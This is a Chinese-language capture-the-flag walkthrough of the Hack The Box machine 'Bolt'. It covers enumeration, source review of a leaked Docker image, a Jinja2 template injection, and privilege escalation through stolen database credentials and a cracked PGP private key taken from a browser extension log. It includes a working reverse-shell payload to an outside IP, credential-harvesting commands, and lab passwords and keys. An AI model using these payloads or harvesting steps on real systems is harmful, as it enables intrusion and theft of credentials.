[Hack The Box] HTB—Bolt walkthrough
咕咕咕咕咕,咕到retired我就可以抄walkthrough了
HTB—Bolt
官方wp:https://app.hackthebox.com/machines/Bolt/walkthroughs
一、信息搜集
1.端口
nmap
nmap -sV 10.10.11.114
深度扫描开放端口
nmap -sC -sV -n -T5 -p 22,80,443 10.10.11.114 -oN PortsDepth.txt
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA)
| 256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA)
|_ 256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Starter Website - About
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_http-server-header: nginx/1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Not valid before: 2021-02-24T19:11:23
|_Not valid after: 2022-02-24T19:11:23
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
443端口的ssl证书公用名commonName=passbolt.bolt.htb
公用名 (AKA CN) 表示受 SSL 证书保护的服务器名称。仅当请求主机名与证书公用名匹配时,证书才有效。大多数 Web 浏览器在连接到与证书中的公用名不匹配的地址时会显示警告消息。
The Common Name (AKA CN) represents the server name protected by the SSL certificate. The certificate is valid only if the request hostname matches the certificate common name. Most web browsers display a warning message when connecting to an address that does not match the common name in the certificate.
修改hosts将两个域名都加上
10.10.11.114 bolt.htb
10.10.11.114 passbolt.bolt.htb
Passbolt | Open source password manager for teams
Starter Website - About (bolt.htb)
2.vhosts
扫描子域名看看(ffuf我也试过,感觉gobuster好用一点)
gobuster vhost -w /usr/share/dnsrecon/subdomains-top1mil.txt -u http://bolt.htb/
得到另外两个个子域名
Found: mail.bolt.htb (Status: 200) [Size: 4943]
Found: demo.bolt.htb (Status: 302) [Size: 219]
http://mail.bolt.htb/
http://deom.bolt.htb/
二、网站渗透
80 bolt cms,有个命令执行漏洞,但是需要用户(后来发现根本不是一个boltcms……)
注册失败,爆破admin用户没有成功
1.docker分析
翻翻主页发现有个download选项,把镜像下载下来
导入并运行docker镜像image.tar
docker load --input image.tar
docker images //查看镜像
# flask-dashboard-adminlte_appseed-app latest 859e74798e6c 11 months ago 154MB
docker run -itd 859e74798e6c //运行image
docker exec -it 623ea34 /bin/sh //进入容器
发现网站文件是在/app
下,cp命令复制出来
docker cp 623ea347a31f:app ./app
再加上根目录下运行的run.py和配置文件config.py
,稍微看一下源码
2.源码审计
config.py
import os
from decouple import config
class Config(object):
basedir = os.path.abspath(os.path.dirname(__file__))
# Set up the App SECRET_KEY
SECRET_KEY = config('SECRET_KEY', default='S#perS3crEt_007')
# This will create a file in <app> FOLDER
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'db.sqlite3')
SQLALCHEMY_TRACK_MODIFICATIONS = False
MAIL_SERVER = 'localhost'
MAIL_PORT = 25
MAIL_USE_TLS = False
MAIL_USE_SSL = False
MAIL_USERNAME = None
MAIL_PASSWORD = None
DEFAULT_MAIL_SENDER = 'support@bolt.htb'
class ProductionConfig(Config):
DEBUG = False
# Security
SESSION_COOKIE_HTTPONLY = True
REMEMBER_COOKIE_HTTPONLY = True
REMEMBER_COOKIE_DURATION = 3600
# PostgreSQL database
SQLALCHEMY_DATABASE_URI = '{}://{}:{}@{}:{}/{}'.format(
config( 'DB_ENGINE' , default='postgresql' ),
config( 'DB_USERNAME' , default='appseed' ),
config( 'DB_PASS' , default='pass' ),
config( 'DB_HOST' , default='localhost' ),
config( 'DB_PORT' , default=5432 ),
config( 'DB_NAME' , default='appseed-flask' )
)
class DebugConfig(Config):
DEBUG = True
# Load all possible configurations
config_dict = {
'Production': ProductionConfig,
'Debug' : DebugConfig
}
SQLALCHEMY_DATABASE_URI这种格式很明显就可以看出是利用flask_sqlalchemy库或者sqlalchemy库连接postgresql的
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'db.sqlite3')
postgresql://appseed:pass@localhost:5432/appseed-flask
但是这里我恢复的最新的docker容器没有db.sqlite3,他在a4ea的那个layer下
sqlite3没有加密,导出打开
admin $1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.
再回去看密码的加密方式
app/base/routes.py
@blueprint.route('/login', methods=['GET', 'POST'])
def login():
login_form = LoginForm(request.form)
if 'login' in request.form:
# read form data
username = request.form['username']
password = request.form['password']
# Locate user
user = User.query.filter_by(username=username).first()
# Check the password
stored_password = user.password
stored_password = stored_password.decode('utf-8')
if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):
login_user(user)
return redirect(url_for('base_blueprint.route_default'))
# Something (user or pass) is not ok
return render_template( 'accounts/login.html', msg='Wrong user or password', form=login_form)
compare_hash(stored_password,crypt.crypt(password,stored_password))
,后来我发现John the Ripper可以识别加密并爆破!不用写py脚本
john -w=/usr/share/wordlists/rockyou.txt admin.hash
admin用户密码
admin/deadbolt
大佬的py脚本
这个用户密码是登陆http://bolt.htb/admin/home的,但是这个主站没有什么漏洞的地方
而mail.bolt.htb的admin账户登陆会返回错误,尝试在demo.bolt.htb里面注册个新的用户
41093412e0da959c80875bb0db640c1302d5bcdffec759a3a5670950272789ad
的layer下app\base\routes.py
@blueprint.route('/register', methods=['GET', 'POST'])
def register():
login_form = LoginForm(request.form)
create_account_form = CreateAccountForm(request.form)
if 'register' in request.form:
username = request.form['username']
email = request.form['email' ]
code = request.form['invite_code']
if code != 'XNSS-HSJW-3NGU-8XTJ':
return render_template('code-500.html')
data = User.query.filter_by(email=email).first()
if data is None and code == 'XNSS-HSJW-3NGU-8XTJ':
# Check usename exists
user = User.query.filter_by(username=username).first()
if user:
return render_template( 'accounts/register.html',
msg='Username already registered',
success=False,
form=create_account_form)
# Check email exists
user = User.query.filter_by(email=email).first()
if user:
return render_template( 'accounts/register.html',
msg='Email already registered',
success=False,
form=create_account_form)
# else we can create the user
user = User(**request.form)
db.session.add(user)
db.session.commit()
return render_template( 'accounts/register.html',
msg='User created please <a href="/login">login</a>',
success=True,
form=create_account_form)
else:
return render_template( 'accounts/register.html', form=create_account_form)
拿到邀请码code == 'XNSS-HSJW-3NGU-8XTJ'
3.SSTI
注册后登陆,(之前看到是Jinja2)再搜render_template
找ssti漏洞,看profile这段源码
@blueprint.route("/example-profile", methods=['GET', 'POST'])
@login_required
def profile():
"""Profiles"""
if request.method == 'GET':
return render_template('example-profile.html', user=user,current_user=current_user)
else:
"""Experimental Feature"""
cur_user = current_user
user = current_user.username
name = request.form['name']
experience = request.form['experience']
skills = request.form['skills']
msg = Message(
recipients=[f'{cur_user.email}'],
sender = 'support@example.com',
reply_to = 'support@example.com',
subject = "Please confirm your profile changes"
)
try:
cur_user.profile_update = name
except:
return render_template('page-500.html')
db.session.add(current_user)
db.session.commit()
token = ts.dumps(user, salt='changes-confirm-key')
confirm_url = url_for('home_blueprint.confirm_changes',token=token,_external=True)
html = render_template('emails/confirm-changes.html',confirm_url=confirm_url)
msg.html = html
mail.send(msg)
return render_template('index.html')
修改profile时候会有ssti,这里需要到邮箱里面确认
@blueprint.route('/confirm/changes/<token>')
def confirm_changes(token):
"""Confirmation Token"""
try:
email = ts.loads(token, salt="changes-confirm-key", max_age=86400)
except:
abort(404)
user = User.query.filter_by(username=email).first_or_404()
name = user.profile_update
template = open('templates/emails/update-name.html', 'r').read()
msg = Message(
recipients=[f'{user.email}'],
sender = 'support@example.com',
reply_to = 'support@example.com',
subject = "Your profile changes have been confirmed."
)
msg.html = render_template_string(template % name)
mail.send(msg)
去mail.bolt.htb用刚刚注册时候填的邮箱登陆,msg.html = render_template_string(template % name)
确认有ssti
{{''.__class__.__mro__}}
#(<class 'str'>, <class 'object'>)
找object可用引用
{{''.__class__.__mro__[1].__subclasses__()}}
# <class 'os._wrap_close'>是第129个
{{"".__class__.__bases__[0].__subclasses__()[129].__init__.__globals__['popen']('whoami').read()}}
//这个payload不行
//找到了这个,Jinja2创建的url_for()方法
{{url_for.__globals__.os.popen("whoami").read()}}
//反弹shell
{{url_for.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.16.9/4444 0>&1"').read()}}
nc -lvvp 4444
三、提权
1.找密码登陆eddie
查看可登陆\有权限的用户
cat /etc/passwd|grep -v nologin |grep -v false
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
eddie:x:1000:1000:Eddie Johnson,,,:/home/eddie:/bin/bash
clark:x:1001:1001:Clark Griswold,,,:/home/clark:/bin/bash
连接数据库,看有没有其他用户的信息
www-data@bolt:~/demo$ cat config.py
cat config.py
"""Flask Configuration"""
#SQLALCHEMY_DATABASE_URI = 'sqlite:///database.db'
SQLALCHEMY_DATABASE_URI = 'mysql://bolt_dba:dXUUHSW9vBpH5qRB@localhost/boltmail'
SQLALCHEMY_TRACK_MODIFICATIONS = True
SECRET_KEY = 'kreepandcybergeek'
MAIL_SERVER = 'localhost'
MAIL_PORT = 25
MAIL_USE_TLS = False
MAIL_USE_SSL = False
#MAIL_DEBUG = app.debug
MAIL_USERNAME = None
MAIL_PASSWORD = None
DEFAULT_MAIL_SENDER = 'support@bolt.htb'
mysql://bolt_dba:dXUUHSW9vBpH5qRB@localhost/boltmail
bolt_dba/dXUUHSW9vBpH5qRB
mysql -ubolt_dba -pdXUUHSW9vBpH5qRB
use boltmail;
show tables; # user
select * from user;
当前用户权限不够不能看mysql库,boltmail库没有我需要的
然后就不会了,wp说要根据用户查文件:
find /etc -user www-data 2>/dev/null
# /etc/passbolt/Seeds
在/etc/passbolt/passbolt.php
中存在一个passwd: rT2;jW7<eY8!dX8}pQ8%
有如下数据库信息:
// Database configuration.
'Datasources' => [
'default' => [
'host' => 'localhost',
'port' => '3306',
'username' => 'passbolt',
'password' => 'rT2;jW7<eY8!dX8}pQ8%',
'database' => 'passboltdb',
],
],
连接
mysql --user=passbolt --password='rT2;jW7<eY8!dX8}pQ8%' --database=passboltdb
show tables;
# 有两个表可以看看,user和secret
account_settings
action_logs
actions
authentication_tokens
avatars
comments
email_queue
entities_history
favorites
gpgkeys
groups
groups_users
organization_settings
permissions
permissions_history
phinxlog
profiles
resource_types
resources
roles
secret_accesses
secrets
secrets_history
user_agents
users
select * from secrets; //会显示不全
select * from users;
select * from secrets\G //在MySQL的sql语句后加上\G ,表示将查询结果进行按列打印,可以使每个字段打印到单独的行。
secret
*************************** 1. row ***************************
id: 643a8b12-c42c-4507-8646-2f8712af88f8
user_id: 4e184ee6-e436-47fb-91c9-dccb57f250bc
resource_id: cd0270db-c83f-4f44-b7ac-76609b397746
data: -----BEGIN PGP MESSAGE-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org
wcBMA/ZcqHmj13/kAQgAkS/2GvYLxglAIQpzFCydAPOj6QwdVV5BR17W5psc
g/ajGlQbkE6wgmpoV7HuyABUjgrNYwZGN7ak2Pkb+/3LZgtpV/PJCAD030kY
pCLSEEzPBiIGQ9VauHpATf8YZnwK1JwO/BQnpJUJV71YOon6PNV71T2zFr3H
oAFbR/wPyF6Lpkwy56u3A2A6lbDb3sRl/SVIj6xtXn+fICeHjvYEm2IrE4Px
l+DjN5Nf4aqxEheWzmJwcyYqTsZLMtw+rnBlLYOaGRaa8nWmcUlMrLYD218R
zyL8zZw0AEo6aOToteDPchiIMqjuExsqjG71CO1ohIIlnlK602+x7/8b7nQp
edLA7wF8tR9g8Tpy+ToQOozGKBy/auqOHO66vA1EKJkYSZzMXxnp45XA38+u
l0/OwtBNuNHreOIH090dHXx69IsyrYXt9dAbFhvbWr6eP/MIgh5I0RkYwGCt
oPeQehKMPkCzyQl6Ren4iKS+F+L207kwqZ+jP8uEn3nauCmm64pcvy/RZJp7
FUlT7Sc0hmZRIRQJ2U9vK2V63Yre0hfAj0f8F50cRR+v+BMLFNJVQ6Ck3Nov
8fG5otsEteRjkc58itOGQ38EsnH3sJ3WuDw8ifeR/+K72r39WiBEiE2WHVey
5nOF6WEnUOz0j0CKoFzQgri9YyK6CZ3519x3amBTgITmKPfgRsMy2OWU/7tY
NdLxO3vh2Eht7tqqpzJwW0CkniTLcfrzP++0cHgAKF2tkTQtLO6QOdpzIH5a
Iebmi/MVUAw3a9J+qeVvjdtvb2fKCSgEYY4ny992ov5nTKSH9Hi1ny2vrBhs
nO9/aqEQ+2tE60QFsa2dbAAn7QKk8VE2B05jBGSLa0H7xQxshwSQYnHaJCE6
TQtOIti4o2sKEAFQnf7RDgpWeugbn/vphihSA984
=P38i
-----END PGP MESSAGE-----
created: 2021-02-25 21:50:11
modified: 2021-03-06 15:34:36
其实我们之前拿到的密码也是eddie用户的密码
eddie/rT2;jW7<eY8!dX8}pQ8%
切换用户
su - eddie
python3 -c 'import pty;pty.spawn("/bin/bash")'
eddie用户目录下有个user.txt,应该也是flag
2.eddle private key
find /var -user eddie 2>/dev/null
# /var/mail/eddie
cd /var/mail
ls
# eddie none root www-data xiaoz
看到邮件内容
eddie@bolt:/var/mail$ cat eddie
From clark@bolt.htb Thu Feb 25 14:20:19 2021
Return-Path: <clark@bolt.htb>
X-Original-To: eddie@bolt.htb
Delivered-To: eddie@bolt.htb
Received: by bolt.htb (Postfix, from userid 1001)
id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST)
Subject: Important!
To: <eddie@bolt.htb>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20210225212019.DFF264CD@bolt.htb>
Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST)
From: Clark Griswold <clark@bolt.htb>
Hey Eddie,
The password management server is up and running. Go ahead and download the extension to your browser and get logged in. Be sure to back up your private key because I CANNOT recover it. Your private key is the only way to recover your account.
Once you're set up you can start importing your passwords. Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning...
-Clark
应该找私钥 Your private key is the only way to recover your account.
,联系之前数据库中拿到的secret,应该是PGP私钥
优良保密协议(PGP)是一种基于信任网络的安全协议
OpenPGP
1997年,PGP成为一项互联网标准,称为OpenPGP。许多电子邮件系统都支持了OpenPGP。实际上,PGP信任网络的理念非常适合电子邮件特点。2007年,PGP协议进行了加密算法方面的更新,后来又加入了对Camellia,ECDSA, ECDH和EdDSA等加密算法的支持。
GPG
GNU Privacy Guard(GnuPG或GPG)是一种加密软件,它是PGP加密软件的满足GPL的替代物。GnuPG依照由IETF订定的OpenPGP技术标准设计。GnuPG用于加密、数位签章及产生非对称匙对的软件。
(Go ahead and download the extension to your browser and get logged in.
私钥可能是在浏览器的缓存里面)在home目录找私钥
谷歌数据路径:~/.config/google-chrome/Default
火狐数据路径:〜/ Library / Mozilla / Firefox / Profiles / xxxxxxxx.default /
〜/ Library / Application Support / Mozilla / Firefox / Profiles / xxxxxxxx.default /
grep -r 'BEGIN PGP PRIVATE KEY' ~
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js:const PRIVATE_HEADER = '-----BEGIN PGP PRIVATE KEY BLOCK-----';
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js: // BEGIN PGP PRIVATE KEY BLOCK
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js: result.push("-----BEGIN PGP PRIVATE KEY BLOCK-----\r\n");
Binary file /home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log matches
把符合私钥格式的段落筛出
strings '/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log' | grep -oP '\-\-\-\-\-BEGIN PGP PRIVATE [\s\S]*?END PGP PRIVATE KEY BLOCK\-\-\-\-\-' | head -1
strings '/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js' | grep -oP '\-\-\-\-\-BEGIN PGP PRIVATE [\s\S]*?END PGP PRIVATE KEY BLOCK\-\-\-\-\-' | head -1
得到私钥
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org
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
PSwYYWlAywj5
=cqxZ
-----END PGP PRIVATE KEY BLOCK-----
3.PGP解密
PGP私钥通常有密码加密,可以用gpg2john计算哈希并用john破解
gpg2john.exe pgp.txt > hash
john.exe hash
密码:merrychristmas
用在线工具(PGP 工具 - 在线 PGP 密钥生成器加密解密工具 (pgptool.org))解密之前数据库中得到的加密pgp消息
{"password":"Z(2rmxsNW(Z?3=p/9s","description":""}
得到root的秘密,切换用户
得到flag 4a1c94ec439b2a1c143f228b6114155a
参考wp:
【HTB系列】Bolt l [承影安全团队ChengYingTeam]